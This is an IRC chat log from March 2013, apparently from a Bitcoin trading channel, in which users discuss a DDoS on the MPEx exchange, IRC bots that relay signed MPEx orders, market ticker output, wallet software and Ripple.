I'm sure your own system of IRC networks and servers could manage any load Mar 08 23:39:52 $markov Mar 08 23:39:52 21:35 do you have an inknling of a clue what people would say if i used colored coins 'round here Mar 08 23:40:00 woah Mar 08 23:40:02 should nuke strings that contain his name in <> Mar 08 23:40:04 [MPEX] [S.MPOE] 2000 @ 0.000676 = 1.352 BTC [-] Mar 08 23:44:11 https://bitcointalk.org/index.php?topic=138956.msg1601667#msg1601667 Mar 08 23:44:13 status update. Mar 08 23:47:36 the forum is unreachable for me Mar 08 23:47:44 me too Mar 08 23:47:47 $markov Mar 08 23:47:47 who are you talkin' about you troll you Mar 08 23:47:56 eh no fucking way Mar 08 23:47:57 brb paste. Mar 08 23:48:34 http://pastebin.com/DVMiCcff Mar 08 23:48:35 just loaded for me Mar 08 23:48:50 oh wait. it just had 60 second load times Mar 08 23:50:27 derp Mar 08 23:51:59 [MPEX] [S.DICE] 1 @ 0.005884 BTC [-] Mar 08 23:52:10 mpexbot: markov is Mar 08 23:52:10 is heading to trilema Mar 08 23:52:21 [BTCTC] [ASICMINER-PT] 1 @ 0.679 BTC [-] Mar 08 23:54:33 smickles "Respondes " is not english btw Mar 08 23:54:36 you want responds Mar 08 23:58:17 your bot's outta control mp! Mar 08 23:59:48 what'd iot do ? Mar 09 00:01:06 it quoted me@ 16:39:45 Mar 09 00:01:12 it's ok, i'm famous now Mar 09 00:01:30 lol that's a point Mar 09 00:01:41 smickles it shouldn't mention people by name cause of hilighting issue Mar 09 00:01:42 i shall never die! Mar 09 00:03:15 blockchain: https://bitcointalk.org/index.php?topic=150730.msg1601711#msg1601711 Mar 09 00:05:35 yeah it's been down for a while. Mar 09 00:06:01 i've been in aspergers irc channel all day and only 3 people have spoken Mar 09 00:06:09 not really my place. Mar 09 00:06:12 lol Mar 09 00:06:44 #aspietalk Mar 09 00:06:48 fuckin dead in there Mar 09 00:08:12 [MPEX] [O.BTCUSD.C450T] 206 @ 0.18392015 = 37.8876 BTC [-] Mar 09 00:08:19 [MPEX] [O.BTCUSD.C450T] 144 @ 0.22 = 31.68 BTC [+] Mar 09 00:08:22 try #bitcoin-otc Mar 09 00:09:03 yuck Mar 09 00:09:22 I'm gonna get these apies to talk if it kills me Mar 09 00:09:48 but... why Mar 09 00:10:11 why not? Mar 09 00:10:14 k Mar 09 00:12:23 [BTCTC] [S.MPOE-PT] 1 @ 0.000725 BTC [+] Mar 09 00:16:48 bah, i'll just stop the markov stuffs Mar 09 00:17:22 and i spell poorly too often Mar 09 00:17:49 markov may be a fun little side project Mar 09 00:17:55 but it takes a lot of fiddling Mar 09 00:24:57 ;;bc,convert eur Mar 09 00:24:58 1 BTC = 43.98000 U.S. dollars = 33.8047656 Euros Mar 09 00:25:08 ^ finally back to normal concerns Mar 09 00:27:23 yup, CoinBr.MPBPT-E sells nicely Mar 09 00:27:53 that trust amazes me... jumping now into something that will pay in the end of april.. maybe. Mar 09 00:33:42 ;;bc,stats Mar 09 00:33:47 Current Blocks: 224907 | Current Difficulty: 4367876.0008422 | Next Difficulty At Block: 225791 | Next Difficulty In: 884 blocks | Next Difficulty In About: 5 days, 13 hours, 20 minutes, and 12 seconds | Next Difficulty Estimate: 4768367.08384 | Estimated Percent Change: 9.16901 Mar 09 00:34:53 CoinBr.iDiff-O March SALE: Now at 0.0580 only! Mar 09 00:34:59 http://mpex.coinbr.com/ Mar 09 00:35:01 dis works? Mar 09 00:36:36 jurov? Mar 09 00:36:39 not for me Mar 09 00:36:50 hmmm Mar 09 00:37:03 [HAVELOCK] [SDICE] 14 @ 0.5105 = 7.147 BTC [+] Mar 09 00:37:06 mpex servers are up Mar 09 00:37:11 so its not that. Mar 09 00:37:27 ;;asks 1000 Mar 09 00:37:34 There are currently 105784.75 bitcoins offered at or under 1000.0 USD, worth 9308184.03323 USD in total. | Data vintage: 0.0048 seconds Mar 09 00:37:51 ;;estimate Mar 09 00:37:54 Next difficulty estimate | 4770622.24721 based on data since last change | 4705708.63176 based on data for last three days Mar 09 00:40:25 well, looks like it's hit Mar 09 00:40:35 disconnected it, iptables time Mar 09 00:41:28 jurov lolz Mar 09 00:41:40 smickles bring mpexbot post online pls. Mar 09 00:53:16 Mar 8 22:31:49 ip-10-48-233-64 kernel: [114573.916044] TCP: Possible SYN flooding on port 80. Sending cookies. Check SNMP counters. Mar 09 01:02:09 [BTCTC] [ASICMINER-PT] 1 @ 0.679 BTC [-] Mar 09 01:15:10 !mp Mar 09 01:15:11 Please use http://dpaste.com/ Mar 09 01:15:15 !mp http://dpaste.com/1016618/ Mar 09 01:15:16 Processing. Mar 09 01:15:18 Response: http://dpaste.com/1016619/ Mar 09 01:18:46 !mp http://dpaste.com/1016621/ Mar 09 01:18:46 Processing. Mar 09 01:18:48 Response: http://dpaste.com/1016623/ Mar 09 01:22:40 well there you have it Mar 09 01:34:17 !mp http://dpaste.com/1016636/ Mar 09 01:34:17 Processing. Mar 09 01:34:19 Response: http://dpaste.com/1016637/plain/ Mar 09 01:35:27 !mp http://dpaste.com/1016640/ Mar 09 01:35:28 Processing. Mar 09 01:35:30 Response: http://dpaste.com/1016641/plain/ Mar 09 01:35:43 werks. Mar 09 01:37:27 !mp http://dpaste.com/1016642/ Mar 09 01:37:28 Processing. Mar 09 01:37:29 Response: http://dpaste.com/1016643/plain/ Mar 09 01:37:55 hm? Mar 09 01:38:13 it is saying unrecognized key Mar 09 01:38:21 i can see that Mar 09 01:39:02 can someone else try it Mar 09 01:39:04 my key manager might be using the wrong default key Mar 09 01:41:05 [HAVELOCK] [SDICE] 10 @ 0.5299 = 5.299 BTC [+] Mar 09 01:44:41 !mp http://dpaste.com/1016647/ Mar 09 01:44:43 Processing. Mar 09 01:44:44 Response: http://dpaste.com/1016648/plain/ Mar 09 01:52:58 hey nanotube Mar 09 01:53:10 what's up with gribble.. needed to re-auth and it gave me this: Mar 09 01:53:11 Forbidden Mar 09 01:53:11 You don't have permission to access /otps/D655A630A13E8C69 on this server. Mar 09 01:54:11 Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. Mar 09 01:56:21 HALP! Mar 09 01:56:50 call nanotube Mar 09 01:56:51 Having a problem, Citizen? Mar 09 01:57:15 (15:52) < mod6> hey nanotube Mar 09 01:59:13 i can verify that this failure occurs on two sepearte hosts Mar 09 02:00:29 < mircea_popescu> smickles bring mpexbot post online pls. << right away capin' Mar 09 02:01:29 $hrlp Mar 09 02:01:32 $help Mar 09 02:01:32 jurov: (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. Mar 09 02:02:49 online tested and working Mar 09 02:03:08 hmm, how to have help list the 3 commands Mar 09 02:03:23 there are depth, vwap, and post Mar 09 02:03:49 you can do a 'help ' to get specifics Mar 09 02:03:58 $help vwap Mar 09 02:03:59 smickles: (vwap Takes no arguments.) -- Returns all available market data, excepting depth Mar 09 02:05:30 hm? Mar 09 02:06:13 $depth Mar 09 02:06:15 FabianB: http://pastebin.com/4isFGaWt Mar 09 02:13:29 ok i was able to use MPEx via dpaste & assbot Mar 09 02:13:46 [MPEX] [S.MPOE] 1 @ 0.00074998 BTC [+] Mar 09 02:15:16 works nicely Mar 09 02:15:46 cool mod6 thanks Mar 09 02:15:51 np Mar 09 02:16:28 i gotta see if any of the proxies can process PGP messages similar to mpex.co used to -- otherwise I gotta change my perl scripts Mar 09 02:17:10 if they are online, yes, works exactly the same Mar 09 02:17:44 that'll be l33t Mar 09 02:17:56 cause i can be lazy until i gotta update 'em with the new mpex key Mar 09 02:17:58 ;) Mar 09 02:23:46 pympex should be spewing out messages with new key by now Mar 09 02:23:53 *checks* Mar 09 02:26:18 no it's not Mar 09 02:26:23 datetime.utcnow() < datetime(2013, 3, 10, 23, 59, 59) Mar 09 02:26:36 ^something is wrong here Mar 09 02:29:02 i understood the change will be tomorrow... March 10 midnight Mar 09 02:29:08 yeah Mar 09 02:29:11 same Mar 09 02:30:05 looks like it's indeed switched Mar 09 02:30:13 ;;calc 45*25 Mar 09 02:30:14 1125 Mar 09 02:30:25 everyone fix ya code to datetime.utcnow() < datetime(2013, 3, 9, 23, 59, 59) Mar 09 02:30:44 sigh. Mar 09 02:31:10 when it rains, it pours Mar 09 02:34:08 [BTCTC] [ASICMINER-PT] 10 @ 0.69 = 6.9 BTC [+] Mar 09 02:35:23 well, ok gotta run for a bit here... but got lots more to do. Mar 09 02:35:37 The good news is that MPEx orders are processing with ye ole assbot Mar 09 02:35:38 :) Mar 09 02:36:35 actually looks like both keys work now Mar 09 02:36:39 so false alarm Mar 09 02:36:54 oh thats cool. thanks for checking that out. Mar 09 02:38:28 nanotube: when you get back... im still getting a 403 Forbidden when trying to get my OTP from gribble. I'll be back perhaps after midnight CDT if you need help or anything... Mar 09 02:38:30 hm, mpex.coinbr.com back online although very slowly Mar 09 02:42:18 [BTCTC] [ASICMINER-PT] 7 @ 0.7 = 4.9 BTC [+] Mar 09 03:04:08 meow Mar 09 03:16:18 ;;depth Mar 09 03:16:18 Error: "depth" is not a valid command. Mar 09 03:16:22 lol Mar 09 03:16:24 woops Mar 09 03:16:27 $depth Mar 09 03:16:30 smickles: http://pastebin.com/4AHkvU29 Mar 09 03:20:04 $post ZNbMDwrk Mar 09 03:20:08 smickles: http://pastebin.com/uWhRX9Br Mar 09 03:21:05 [MPEX] [O.BTCUSD.P310T] 75 @ 0.02656921 = 1.9927 BTC [-] Mar 09 03:29:24 mpx.coinbr.com no long works? Mar 09 03:29:49 blockchain not working? Mar 09 03:32:30 Namworld: he's using a bitvps Mar 09 03:33:56 [BTCTC] [COGNITIVE] 1 @ 0.24899 BTC [-] Mar 09 03:33:57 not anymore Mar 09 03:34:02 afaik Mar 09 03:34:05 rackspace? Mar 09 03:34:11 he got kicked or smth Mar 09 03:34:20 no quickly grabber amazon Mar 09 03:34:25 *grabbed Mar 09 03:35:10 but had to drop mpex.coinbr.com, it's just not manageable Mar 09 03:35:11 i have a proxy runing but only for people i death with this one aint leakin Mar 09 03:35:21 death = dealth Mar 09 03:35:26 but close. Mar 09 03:35:29 me similarly Mar 09 03:35:52 Damn, mpex.coinbr.com was my only access Mar 09 03:35:57 and messed up the setup a bit, coinbr.com will be available when dns clears out Mar 09 03:50:04 [HAVELOCK] [SDICE] 2 @ 0.5299 = 1.0598 BTC [+] Mar 09 03:57:00 really kind of ridiculous to make a story and pretend it means more than absolutely nothing Mar 09 03:57:04 http://www.forbes.com/sites/jonmatonis/2013/03/08/first-bitcoin-hedge-fund-launches-from-malta/ Mar 09 03:57:59 http://bitcoinfund.eu/joinus Mar 09 03:58:46 http://bitbet.us/bet/261/bfl-will-deliver-asic-devices-before-march-15th/ Mar 09 03:59:39 ^ Suppose Luke-jr travels to BFL HQ next week and obtains BFL ASICs before the 15th. Will the bet be decided as true? Does it still count as "delivery" if he picks them up? Mar 09 04:00:07 I think he's an order-holding customer. Mar 09 04:00:10 preorder Mar 09 04:01:14 he's a customer, it says customers Mar 09 04:01:19 plural Mar 09 04:01:22 so 2 people Mar 09 04:02:31 luke and giga Mar 09 04:03:54 yeah Mar 09 04:04:11 the bet for May will exclude luke and giga Mar 09 04:10:58 [BTCTC] [ASICMINER-PT] 1 @ 0.72 BTC [+] Mar 09 04:12:31 [BTCTC] [ASICMINER-PT] 3 @ 0.749 = 2.247 BTC [+] Mar 09 04:15:40 !help Mar 09 04:15:41 List of commands: Mar 09 04:15:42 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 09 04:15:43 !mp (desc: returns the response from MPEX order) Mar 09 04:18:27 $post WKARrrYc Mar 09 04:18:30 smickles: http://pastebin.com/BQPH63iF Mar 09 04:22:23 >>Bitcoin is beta, SatoshiDICE is taking advantage of bugs in the software. Mar 09 04:22:25 ZOMG Mar 09 04:25:55 [BTCTC] [COGNITIVE] 1 @ 0.249 BTC [+] Mar 09 04:26:33 [BTCTC] [COGNITIVE] 1 @ 0.249 BTC [+] Mar 09 04:32:18 hmm, I can't decode MPEx's replies Mar 09 04:34:37 Namworld: usin mpexbot? Mar 09 04:34:57 using a proxy just like mpex.coinbr.com Mar 09 04:35:31 I was just recently able to decode an mpex reply Mar 09 04:36:48 just found out amazon s3 allows POSTS Mar 09 04:36:50 It says perhaps i didn't sign the key. But it worked before. Mar 09 04:37:01 jurov: so? Mar 09 04:37:13 i'll do mpex proxy there, FUCK YA DDoSers Mar 09 04:37:19 is this done in real time? Mar 09 04:37:19 wow Mar 09 04:37:20 https://twitter.com/MPEx1 Mar 09 04:37:20 mod6: kakobrekla fixed now. Mar 09 04:37:31 the what? Mar 09 04:37:35 that's neat of you. Mar 09 04:37:55 I'm booting my Bitcoin Armory. Tip incoming. Mar 09 04:38:02 It takes a while to boot tho Mar 09 04:38:04 i can mirror mpex to the s3 cdn Mar 09 04:38:12 continously Mar 09 04:38:25 <[\\\]> Namworld, get ssd, it loads in <1 minutes Mar 09 04:38:28 <[\\\]> -s Mar 09 04:38:38 and it can accept post requests that show as files in s3 storage Mar 09 04:39:06 <[\\\]> lol, ddos amazon! Mar 09 04:39:09 ... 1 minute? Mar 09 04:39:20 It takes me 40 minutes to boot the damn thing Mar 09 04:39:28 http://www.redstate.com/2013/03/06/tech-at-night-sacco-vanzetti-and-aaron-swartz-were-all-guilty-its-time-to-break-up-the-bitcoin-ring/ Mar 09 04:39:29 lol Mar 09 04:39:37 <[\\\]> you need more ram Mar 09 04:39:40 <[\\\]> and an i7 Mar 09 04:40:53 I have hexacore with 8 GB ram... the ressources are hardly being used. Mar 09 04:41:08 <[\\\]> then you're doing something wrong Mar 09 04:41:11 <[\\\]> it shouldn't take that long Mar 09 04:41:13 Armory still takes it's goddamn sweet time to load Mar 09 04:41:20 <[\\\]> have you updated it? Mar 09 04:41:29 It also keeps crashing randomly. And yes, I update it. Mar 09 04:41:37 It just keeps screwing up. Mar 09 04:41:40 <[\\\]> heh Mar 09 04:42:11 months ago, it used to load in 3 minutes Mar 09 04:42:45 now it crashes, doesn't update confirmations while running and take 40 minutes to boot. Mar 09 04:42:53 Reinstalling doesn't help. Mar 09 04:43:16 <[\\\]> bitcoin .8? Mar 09 04:44:02 .8? Mar 09 04:45:09 oh, a new bitcoind is out. Mar 09 04:45:14 I'll upgrade Mar 09 04:45:37 But I've been upgrading bitcoind/armory when new versions come out for quite some time and it never fixed anything. Mar 09 04:45:55 this one makes a difference Mar 09 04:46:51 I think it's more of a problem with Armory but eh Mar 09 04:48:13 I'm reloading the blockchain now... Mar 09 04:48:27 Damn, 0.8 is going much faster Mar 09 04:48:53 But .7 wasn't really slow to start with. Mar 09 04:57:58 ahh Mar 09 05:00:08 so mpex.coinbr.com was down earlier and back up now ? Mar 09 05:00:23 no, still not back Mar 09 05:00:46 yeah, 504 Mar 09 05:01:01 the DDoS is persistent... It's been what, 2 or 3 days? Mar 09 05:04:01 so, do we now have a complete bot interface to mpex? Mar 09 05:04:09 yes Mar 09 05:04:17 nanotube two. Mar 09 05:04:24 and imsaguy is working on the 3rd Mar 09 05:04:44 the drawbacks of having a dayjob lol. it was his idea to start with Mar 09 05:05:21 Namworld i see it ? Mar 09 05:05:38 hm now its timing out Mar 09 05:06:30 great. :) Mar 09 05:06:56 It was down. I think jurov is currently putting it back up on amazon Mar 09 05:07:52 !ticker m s.mpoe Mar 09 05:07:53 [MPEX:S.MPOE] 1D: 0.00067334 / 0.00073042 / 0.00075 (329638 shares, 240.77 BTC), 7D: 0.00067334 / 0.00074909 / 0.00078628 (11033986 shares, 8,265.55 BTC), 30D: 0.0006153 / 0.00068474 / 0.00078628 (60249830 shares, 41,255.72 BTC) Mar 09 05:08:02 so basically all systems are a go except web Mar 09 05:08:12 this must be pissing the web crowd off Mar 09 05:08:53 Well I could sign orders manually and use the bot Mar 09 05:09:11 7day OIX : Mar 09 05:09:11 46.96 (48.56 / 33.66) Mar 09 05:09:11 27`206.06 (89.3 / 10.7) Mar 09 05:09:13 But that's slow to swiftly switch orders around. Mar 09 05:09:20 ;;ticker Mar 09 05:09:21 BTCUSD ticker | Best bid: 43.90000, Best ask: 43.99900, Bid-ask spread: 0.09900, Last trade: 43.99900, 24 hour volume: 43158.15323252, 24 hour low: 42.00000, 24 hour high: 44.50000, 24 hour vwap: 43.43720 Mar 09 05:09:30 Good for just placing an order or two. Mar 09 05:09:31 Namworld i suppose you could write an irc bot of your own Mar 09 05:09:41 why dont we stop selling BTC for USD and jus BTC all together Mar 09 05:09:53 that way gox prices wont go down, and if we pay with BTC the value doesnt go down Mar 09 05:09:57 That would be assuming I could even program such a thing. I don't have the know-how to. Mar 09 05:10:10 seems like a win win situation if everyone does that Mar 09 05:10:20 Namworld im sure one will crop up soon enough, much like pympex did Mar 09 05:10:30 if they sell to USD, its lose-lose. btc value goes down and they get fiat Mar 09 05:10:31 lol Mar 09 05:10:45 Bowjob don't tell me about it, i aint sellin :) Mar 09 05:10:49 Because merchants being paid in BTC needs to sell them to buy the goods from others in USD... Mar 09 05:11:12 and i'm researching users posting orders directly into amazon s3 :) Mar 09 05:11:18 http://blockchain.info/ still dead ? Mar 09 05:11:29 those merchants that need goods should pay other merchants in btc Mar 09 05:11:31 and so forth Mar 09 05:11:34 a DDoS resistant MPEx interface. Mar 09 05:11:36 mhm Mar 09 05:11:50 lol well folks... i hate to be the one feeding the conspiracy theories, but Mar 09 05:12:09 while it's marginally possible some random internet bloke has the power to be doing all this, it seems somewhat unlikely. Mar 09 05:12:33 there is a lot of skill and there are a lot of resources involved with such ample ddosing Mar 09 05:12:57 i already thought of this, and I know who Mar 09 05:13:04 Anyone with a good botnet could do so, but why? Mar 09 05:13:27 just the traffic i've clocked, and i've not clocked all of it, would have cost on the black market a good few thousand $$$ Mar 09 05:13:33 [BTCTC] [ESECURITYSABTC] 11 @ 0.62997 = 6.9297 BTC [-] Mar 09 05:13:34 Where's the request for money for it to stop? Mar 09 05:13:45 even if im getting half of all ddos bitcoing is getting , that puts the total cost of this adventure in the 10k range Mar 09 05:13:54 not counting the time and effort involved on the admin side Mar 09 05:14:06 Namworld no, not anyone. Mar 09 05:14:18 there's literally not that many people with a botnet good enough Mar 09 05:14:24 Unless it was started by a botnet owner, not purchased off the black market. Mar 09 05:14:28 also there's risks involved (if you run it continuously isps find your zombies) Mar 09 05:14:35 Infected computers don't cost much to operate. Mar 09 05:14:42 ya but ideologically speaking, it'd seem an odd fit to ddos bitcoin Mar 09 05:15:01 Seems it's targeting MPEx only. Mar 09 05:15:17 MPEx has a huge wallet... I would have thought ransom request. Mar 09 05:15:34 some people have thought so/asked, but... Mar 09 05:15:45 nothing so far. Mar 09 05:15:59 whoo is the biggest dipshit with a grudge? There is your answer Mar 09 05:16:06 and blockchain.info wallet for instance isn't all that fat. Mar 09 05:16:16 jborkl_ i dunno ? Mar 09 05:16:40 http://www.bitcoinmoney.com/post/44886495299/audio-erik-voorhees-on-the-peter-schiff-show Mar 09 05:17:08 that Has 24hr access to botnets Mar 09 05:17:43 um Mar 09 05:17:48 eskimo! Mar 09 05:17:53 lol totally. Mar 09 05:17:57 muggos Mar 09 05:18:01 no Mar 09 05:18:03 ciuciu Mar 09 05:18:25 that guy was off a whole other hinge Mar 09 05:18:32 I don't think any of these individuals have such botnet access. Mar 09 05:18:41 prolly not Mar 09 05:18:42 ciuciu couldn't afgford to retire his 50 btc debt are you kidding m,e ? Mar 09 05:23:22 deposits/withdrawals flushed Mar 09 05:24:02 if someone wants to pm me a proxy Mar 09 05:25:23 *hanbot* aites. thar is! one last bitbet thingy i need to asks about, that being: http://bitbet.us/admin/resolve/43/ has been awaiting resolution a few days, cause awaiting info to be publisht (one of the first bets i put in, weird resolution/closing date delay) Mar 09 05:25:33 *hanbot* in the meantime billboard has completely changed their charts Mar 09 05:28:05 hey guys check out my ticker bithub.asia hope to be adding some assets prices and gold and silver prices soon :) Mar 09 05:28:06 [HAVELOCK] [KCIM] 1 @ 1.09 BTC [+] Mar 09 05:28:34 anyone want to process a coupla donations to freenode for me ? you need cc/pp Mar 09 05:29:05 [HAVELOCK] [SDICE] 1 @ 0.52998999 BTC [+] Mar 09 05:29:13 mircea_popescu: how much money are we talking? Mar 09 05:29:36 like 60 gbp Mar 09 05:30:05 [HAVELOCK] [SDICE] 1 @ 0.54879 BTC [+] Mar 09 05:31:16 BitHub o wow, marquee.. haven't seen that in a while Mar 09 05:31:27 you can get a spoof for free just ask in #freenode Mar 09 05:31:52 i want to pay them tho. Mar 09 05:32:16 thanks mircea, hope to have some mpex in there soon and have it in real time Mar 09 05:32:46 pigeons did you get it? Mar 09 05:34:05 [HAVELOCK] [SDICE] 16 @ 0.569 = 9.104 BTC [+] Mar 09 05:35:22 Illlsend it Mp, tell me the detdeta Mar 09 05:35:30 details Mar 09 05:35:36 blockchain.info down? Mar 09 05:35:44 Chaang-Noi since this morning Mar 09 05:35:49 goddam. Phone Mar 09 05:35:51 thanks Mar 09 05:35:55 something/somebody is going after crucial bitcoin infrastructure Mar 09 05:36:15 im not too shocked, someone just wants lower priced coins Mar 09 05:36:23 prolly. Mar 09 05:36:47 mpex is hanging by a thread, mostly because it doesn't actually need a website Mar 09 05:36:56 but website centric services are going to be painful. Mar 09 05:37:06 Someone manipulated the price. Convinced businesses to accept Bitcoin and newswriter to make good articles. Mar 09 05:37:30 Now that he's sold at a hefty price all he got, he's attacking stuff to send it all back down. Mar 09 05:38:29 it won't work. Mar 09 05:38:48 Doesn't seem to be. Mar 09 05:39:27 so Mar 09 05:39:32 government, trolls? Mar 09 05:39:50 holy shit, is today saterday? Mar 09 05:40:00 yes Mar 09 05:40:04 yes, for you at least Mar 09 05:40:07 almost for me Mar 09 05:40:14 yep saturday lunch time Mar 09 05:40:15 oh fuck, i thought it was sunday Mar 09 05:40:53 oh wow Mar 09 05:41:05 i got messed up on thursday Mar 09 05:41:40 niiiice Mar 09 05:41:45 good break from bitcoin Mar 09 05:43:34 Chaang-Noi: what have you been drinking recently? Mar 09 05:53:37 mircea_popescu: fatter tube holding up? Mar 09 05:53:59 dub so far we're doing irc bot trade. Mar 09 05:54:04 !help Mar 09 05:54:05 List of commands: Mar 09 05:54:06 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 09 05:54:07 !mp (desc: returns the response from MPEX order) Mar 09 05:54:18 $help Mar 09 05:54:19 mircea_popescu: (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. Mar 09 05:54:24 bah Mar 09 05:54:26 $help post Mar 09 05:54:26 mircea_popescu: (post ) -- Supply a pastebin paste key containing a signed and encrypted MPEx command. Respondes with a pastebin URL with MPEx's response. Mar 09 05:54:34 irc trade is cool Mar 09 05:54:52 i like the idea of twitter trading for mainstreamers for situations like this Mar 09 05:55:06 on bitfunder can you not see the market if you do not have an account? Mar 09 05:55:19 you can see what each asset is worth Mar 09 05:55:24 yeah Mar 09 05:55:29 and bids and asks on teh asset Mar 09 05:55:35 actually brokers also work fine, the only thing off is the website Mar 09 05:55:51 Chaang-Noi: https://bitfunder.com/market Mar 09 05:56:09 thanks dub facepalm for no link to that one the homepage... Mar 09 05:56:33 its there the site doesnt work in some browsers Mar 09 05:56:38 I had the same problem Mar 09 05:56:54 oh Mar 09 05:57:02 you can still facepalm Mar 09 05:57:04 asicminer at .7 on both sites, not bad Mar 09 05:57:11 brokers? Mar 09 05:57:25 BitHub yes. jurov, smickles etc Mar 09 05:57:33 ahh so you actually have mpex brokers that can trade outside of mpex? Mar 09 05:57:52 sorry i thought it was something dif Mar 09 05:58:02 what do you mean outside of mpex ?! Mar 09 05:58:28 so i could be a broker for outsiders just by having a membership? :) Mar 09 05:58:30 yawn http://www.pymnts.com/briefing-room/PYMNTS-International/2013/02/How-Owning-Bitcoin-Is-Owning-An-ETF-On-The-Whole-Bitcoin-Space Mar 09 05:58:35 ;;eauth mircea_popescu Mar 09 05:58:36 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Mar 09 05:58:42 BitHub yup Mar 09 05:59:35 ima have to sign up if i ever see 30btc to spare Mar 09 05:59:40 ;;everify freenode:#bitcoin-otc:f1d64cbfe5e2c1cd476971545c0677c8865a7770210dd351e8d0d57a Mar 09 05:59:41 have* Mar 09 05:59:41 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Mar 09 06:00:12 ;;rate pizzaman1337 2 Official supplier of freenode chains. Mar 09 06:00:14 Rating entry successful. Your rating of 2 for user pizzaman1337 has been recorded. Mar 09 06:03:06 ;;rate mircea_popescu 2 MPEx and one otc deal Mar 09 06:03:07 Rating entry successful. Your rating of 2 for user mircea_popescu has been recorded. Mar 09 06:04:32 this btc sell off is mildly entertaining Mar 09 06:04:43 watching coinlab.. bulls vs bears fighting Mar 09 06:05:48 sel off? its higher than last time i looked by a few dollars Mar 09 06:06:24 ;;rate kakobrekla 3 Great experience with Bit4X, highly recommended Mar 09 06:06:26 Rating entry successful. Your rating of 3 for user kakobrekla has been recorded. Mar 09 06:06:53 thanks :) Mar 09 06:07:02 np, thank you, man Mar 09 06:07:08 < mircea_popescu> what do you mean outside of mpex ?! << transfer ownership of mpex assest as people, preferrably with contracts Mar 09 06:08:07 that'd seem to be inside of mpex :p Mar 09 06:08:32 just because it's in my mpex account, doesn't mean i necessarily own it. I may hold it for another who then wants to trade with a third who wants me to hold it for them as well Mar 09 06:08:34 hm is kakobrekla catching up ? Mar 09 06:08:41 trade happened off mpex Mar 09 06:08:47 yeah, better downrate me quick mircea_popescu Mar 09 06:08:52 totally. Mar 09 06:08:55 ;) Mar 09 06:08:59 smickles well, let's see here. Mar 09 06:09:12 on one hand, if you're a broker, then you enter trades into the exchange at the behest of customers. Mar 09 06:09:14 id be at 200 if id been a rating whore Mar 09 06:09:24 if you don't enter the trades you're not a broker, you're a bucket shot. Mar 09 06:09:38 on the other hand, if you're acting in a private capacity obviously you can do whatever you want with your own assets. Mar 09 06:09:53 what's a bucket shot? Mar 09 06:09:56 now, as long as the third party knows this, ie, you're not presenting yourself as a broker when you're not brokering this is all fine Mar 09 06:10:02 ;;google bucket shop Mar 09 06:10:03 Bucket shop (stock market) - Wikipedia, the free encyclopedia: ; Bucket shop - Wikipedia, the free encyclopedia: ; The Bucket Shop Cafe: Mar 09 06:10:44 also there is the taboo way to trade off mpex Mar 09 06:10:54 or actually Mar 09 06:11:04 ripple ious for mpex assets Mar 09 06:11:10 :D Mar 09 06:11:15 how about this, register, buy X, sell the gpg key Mar 09 06:11:40 well, it's not taboo, it's just kinda stupid Mar 09 06:11:41 or rather, sell X and deliver the key Mar 09 06:11:51 has anyone tried open transactions ious? I like that ripple idea but they don't have a server Mar 09 06:12:26 I think you only get one key Mar 09 06:12:37 doctor_pullfingr: knotwork runs 2 open-transactions servers. ripple does have a server. do you mean cause they didnt open source the server yet? Mar 09 06:12:44 i tried OT, but it took so much to install on my system that i kinda burned out on it Mar 09 06:13:29 i don't care if they open source the server or whatever, private licensees is fine, I just want my own server. Mar 09 06:13:30 afaik, you get as many keys as you buy Mar 09 06:13:44 (well, that's a silly way to put it) Mar 09 06:14:01 yes, I meant one key for 30 btc. Mar 09 06:14:22 you can have as many keys as you like but the keys arent "active" without 200 xrp owner reserve + 50 xrp + 50 xrp per trust line Mar 09 06:15:42 any practical uses for ripple yet? Mar 09 06:16:29 same as before, private payment networks, plus now the integration with bitstamp and ukto's weexchange Mar 09 06:16:43 Oh, I thought you meant sell the mpex key. I got the free ripples so I can sign up people already have, but I still want my own server. Mar 09 06:17:01 for arbitrage or something Mar 09 06:17:15 maybe one of those fancy ripple gateways Mar 09 06:18:13 is bitstamp the russian one ? Mar 09 06:18:22 slovenian Mar 09 06:18:23 with the novacocacoin ? Mar 09 06:18:44 that is btc-e Mar 09 06:18:45 i think Mar 09 06:19:22 bitstamp is retarded, the only reason they have so big market share is cause they dont hassle folks with ids n stuff Mar 09 06:19:54 thanks mp for the lesson I'll be changing my nick to bucketshop soon Mar 09 06:19:56 a ok Mar 09 06:20:03 lol Mar 09 06:21:31 kakobrekla aren't we discussing the practical use of ripple? Mar 09 06:22:00 the practical use of ripple invloves bitstamp which involves retardation Mar 09 06:22:36 http://www.runtogold.com/images/potential-bitcoin-prices.jpg Mar 09 06:22:40 This got me a boner Mar 09 06:22:40 lol Mar 09 06:22:45 lalaland Mar 09 06:24:04 I think there is a ripple gateway client in the wild but to make it work with mpex seat you need the to server. I'm floating the idea for comments, I don't know for sure if this will work. Mar 09 06:24:23 *ot server Mar 09 06:24:41 you need the what ? Mar 09 06:25:28 There is some kind of ubunto install now for OT, you just tell your system about the repo and use apt-get or somesuch to install it Mar 09 06:27:15 mp Open Transactions Server Mar 09 06:27:42 why ? Mar 09 06:29:36 no idea, I dont see how OT helps with mpex really Mar 09 06:29:42 can someone pm me an mpex proxy? Mar 09 06:30:13 If I want to sell ripple ious where people pay me bullshit fiat and I automatically purchase beloved satoshi dice, then I need something that talks to mpex. I think OT is the closest tool for that,,but some automation is probably lacking. Mar 09 06:31:31 what's wrong with pympex ? Mar 09 06:31:45 maximian : Mar 09 06:31:48 !help Mar 09 06:31:50 List of commands: Mar 09 06:31:51 $help post Mar 09 06:31:51 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 09 06:31:51 mircea_popescu: (post ) -- Supply a pastebin paste key containing a signed and encrypted MPEx command. Respondes with a pastebin URL with MPEx's response. Mar 09 06:31:52 !mp (desc: returns the response from MPEX order) Mar 09 06:32:19 I'm lazy… just wanted to replace a string in pympex Mar 09 06:32:23 a kk Mar 09 06:32:28 didn't know if you knew or not Mar 09 06:32:37 nothing at all wrong with pympex. I use it happily. Are you Mar 09 06:32:51 does 